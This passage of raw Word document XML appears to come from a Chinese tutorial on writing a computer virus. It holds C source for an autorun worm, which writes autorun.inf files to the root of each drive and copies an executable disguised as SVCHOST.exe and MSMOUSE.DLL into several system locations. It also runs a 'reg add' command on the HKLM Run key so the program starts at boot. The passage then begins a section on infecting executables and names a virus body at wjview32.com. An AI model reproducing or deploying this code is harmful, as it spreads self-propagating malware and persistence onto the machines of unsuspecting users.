      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>autorun</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>]\</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>nopen</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>=SVCHOST.exe\n\</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>nshell</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>\\1=</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>打开</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>nshell</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>\\1 \\Command=SVCHOST.exe\</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>nshell</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>\\2\\=Open\</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>nshell</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>\\2\\Command=SVCHOST.exe\</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>nshellexecute</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>=SVCHOST.exe"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve"> *files_autorun[10] =</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>"c:\\autorun.inf"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>"d:\\autorun.inf"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>"e:\\autorun.inf"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve"> *files_svchost[SVCHOST_NUM + 1] =</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>"c:\\windows\\system\\MSMOUSE.DLL"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>"c:\\windows\\system\\SVCHOST.exe"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>"c:\\windows\\SVCHOST.exe"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>"c:\\SVCHOST.exe"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>"d:\\SVCHOST.exe"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>"e:\\SVCHOST.exe"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>"SVCHOST.exe"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve"> *regadd =</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>reg</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve"> add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v SVCHOST /d C:\\Windows\\system\\SVCHOST.exe /f"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>copy</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve"> *infile, </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve"> *outfile)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:t>{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rPr>
          <w:color w:val="005032"/>
        </w:rPr>
        <w:t>FILE</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve"> *input, *output;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rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve"> temp;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rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>strcmp</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve">(infile, outfile) != 0 &amp;&amp; ((input = </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>fopen</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve">(infile, </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="2A00FF"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>rb</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>)) != NULL)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tab/>
        <w:t xml:space="preserve">&amp;&amp; ((output = </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>fopen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pP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tab/>
        <w:t xml:space="preserve">(outfile, </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="2A00FF"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>wb</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>)) != NULL))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:tab/>
        <w:t>{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rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve"> (!</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>feof</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>(input))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  <w:t>{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tab/>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>fread</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>(&amp;temp, 1, 1, input);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tab/>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>fwrite</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>(&amp;temp, 1, 1, output);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  <w:t>}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rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>fclose</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>(input);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rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>fclose</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>(output);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> main(</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:lastRenderedPageBreak/>
        <w:t>{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rPr>
          <w:color w:val="005032"/>
        </w:rPr>
        <w:t>FILE</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve"> *input, *output;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rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve"> i, k;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rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve"> (i = 0; i &lt; 3; i++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:tab/>
        <w:t>{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  <w:t xml:space="preserve">output = </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>fopen</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve">(files_autorun[i], </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>"w"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>);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rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>fprintf</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve">(output, </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>"%s"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>, autorun);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rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>fclose</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>(output);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:tab/>
        <w:t>}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rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve"> (i = 0; i &lt;= SVCHOST_NUM; i++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:tab/>
        <w:t>{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rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve"> ((input = </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>fopen</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve">(files_svchost[i], </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="2A00FF"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>rb</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="2A00FF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>)) != NULL)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  <w:t>{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tab/>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>fclose</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>(input);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tab/>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve"> (k = 0; k &lt; SVCHOST_NUM; k++)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tab/>
        <w:t>{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tab/>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:tab/>
        <w:t>copy(files_svchost[i], files_svchost[k]);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tab/>
        <w:t>}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</w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:tab/>
        <w:t>i = SVCHOST_NUM + 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="642880"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">(regadd); </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve">/* </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>注册</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>SVCHOST.exe,</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>让其在启动时运行</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4098">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE4098">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidRDefault="005E4981" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
        <w:sectPr w:rsidR="005E4981" w:rsidRPr="00EE4098" w:rsidSect="004F52DF">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="849" w:bottom="1440" w:left="993" w:header="851" w:footer="992" w:gutter="0"/>
          <w:cols w:num="2" w:sep="1" w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E4981" w:rsidRPr="005E4981" w:rsidRDefault="005E4981" w:rsidP="005E4981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:rsidR="006D75BE" w:rsidRPr="006D75BE" w:rsidRDefault="006D75BE" w:rsidP="006D75BE"/>
    <w:p w:rsidR="002B555A" w:rsidRDefault="002B555A" w:rsidP="004C3266">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r>
        <w:t>感染可执行文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="009F2751">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、</w:t>
      </w:r>
      <w:r>
        <w:t>在所有磁盘的根目录生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>svchost</w:t>
      </w:r>
      <w:r>
        <w:t>.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>autorun.inf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="009F2751">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、生成病毒体</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00930066">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>c:\windows\wjview32.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="00930066">
      <w:pPr>
